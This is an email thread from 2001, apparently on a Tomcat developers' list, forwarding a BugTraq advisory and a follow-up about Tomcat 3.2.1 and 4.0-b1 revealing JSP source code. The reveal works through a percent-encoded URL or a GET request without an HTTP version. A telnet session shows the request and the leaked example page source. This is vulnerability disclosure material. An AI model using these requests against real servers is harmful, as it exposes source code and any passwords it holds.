This is already fixed in 3.2.2.
> -----Original Message-----
> From: Craig R. McClanahan [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, April 04, 2001 11:09 AM
> To: [EMAIL PROTECTED]
> Subject: [Fwd: Tomcat may reveal script source code by URL trickery]
>
>
> Reported against Tomcat 3.2.1 on BugTraq.
>
> Craig
>
>
> Eric Daniel Mauricio wrote:
>
> > There is another way to get the source from a jsp page using Tomcat.
> >
> > If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
> > you will get the source code and not the jsp processed.
> >
> > In other words, use Apache + Tomcat if you intend to protect
> your source code.
> >
> > telnet maq106 8080
> > Trying 10.0.0.106...
> > Connected to maq106
> > Escape character is '^]'.
> > GET /examples/jsp/num/numguess.jsp
> > HTTP/1.0 200 OK
> > Content-Type: text/plain
> > Content-Length: 1237
> > Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
> > Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2;
> Java 1.3.0;
> > Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
> >
> > <!--
> > Copyright (c) 1999 The Apache Software Foundation. All rights
> > reserved.
> >
> > Number Guess Game
> > Written by Jason Hunter, CTO, K&A Software
> > http://www.servlets.com
> > -->
> >
> > <%@ page import = "num.NumberGuessBean" %>
> >
> > <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
> > <jsp:setProperty name="numguess" property="*"/>
> >
> > <html>
> > <head><title>Number Guess</title></head>
> > <body bgcolor="white">
> > <font size=4>
> >
> > <% if (numguess.getSuccess()) { %>
> >
> > Congratulations! You got it.
> > And after just <%= numguess.getNumGuesses() %> tries.<p>
> >
> > <% numguess.reset(); %>
> >
> > Care to <a href="numguess.jsp">try again</a>?
> >
> > <% } else if (numguess.getNumGuesses() == 0) { %>
> >
> > Welcome to the Number Guess game.<p>
> >
> > I'm thinking of a number between 1 and 100.<p>
> >
> > <form method=get>
> > What's your guess? <input type=text name=guess>
> > <input type=submit value="Submit">
> > </form>
> >
> > <% } else { %>
> >
> > Good guess, but nope. Try <b><%= numguess.getHint() %></b>.
> >
> > You have made <%= numguess.getNumGuesses() %> guesses.<p>
> >
> > I'm thinking of a number between 1 and 100.<p>
> >
> > <form method=get>
> > What's your guess? <input type=text name=guess>
> > <input type=submit value="Submit">
> > </form>
> >
> > <% } %>
> >
> > </font>
> > </body>
> > </html>
> > Connection closed by foreign host.
> >
> > [],
> >
> > ericmau
> >
> > "Sverre H. Huseby" <[EMAIL PROTECTED]> escreveu:
> >
> > > Tomcat may reveal script source code by URL trickery
> > > ----------------------------------------------------
> > >
> > > Sverre H. Huseby advisory 2001-03-29
> > >
> > >
> > >
> > > Systems affected
> > > ----------------
> > >
> > > Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
> > > tested. Other versions may be vulnerable too. The problem is only
> > > present when using Tomcat's built in web server, not when using Tomcat
> > > with Apache Web Server.
> > >
> > >
> > > Description
> > > -----------
> > >
> > > Tomcat (http://jakarta.apache.org/tomcat/), the Reference
> > > Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
> > > Technologies, may be tricked into revealing the source code of JSP
> > > scripts by using simple URL encoding.
> > >
> > >
> > > Details
> > > -------
> > >
> > > It seems that the built in web server in Tomcat does URL decoding in
> > > an unreasonable order. URLs like the following
> > >
> > > http://XXX:8080/examples/jsp/num/numguess.js%70
> > >
> > > where %70 is an URL encoded 'p', returns the source code of index.jsp
> > > rather than running the script on the server side.
> > >
> > > To speculate: The JSP handler is skipped as this URL does not end in
> > > ".jsp", but the static file handler is nevertheless able to map the
> > > URL into a correct file name.
> > >
> > >
> > > Impact
> > > ------
> > >
> > > This design error makes it possible to fetch the source code of JSP
> > > scripts. Such source code may contain database passwords and file
> > > names, and may reveal design errors or programming bugs that make it
> > > possible to further exploit the server or service.
> > >
> > >
> > >
> > > Reported by Sverre H. Huseby, [EMAIL PROTECTED]
> > >
> > > --
> > > <URL:mailto:[EMAIL PROTECTED]>
> > > <URL:http://shh.thathost.com/>
> > >
